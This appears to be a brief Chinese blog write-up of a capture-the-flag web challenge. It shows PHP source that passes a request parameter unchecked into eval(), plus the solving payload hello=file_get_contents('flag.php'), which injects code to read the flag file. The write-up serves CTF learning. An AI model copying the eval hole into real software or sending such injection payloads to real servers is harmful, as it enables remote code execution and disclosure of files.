[百度杯-二月场](Misc-Web)爆破-2

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

 

文件包含 我们可以考虑让他输出flag.php

构造 hello=file_get_contents('flag.php')

 

posted @ 2018-06-23 16:24  轩x  阅读(292)  评论(0编辑  收藏  举报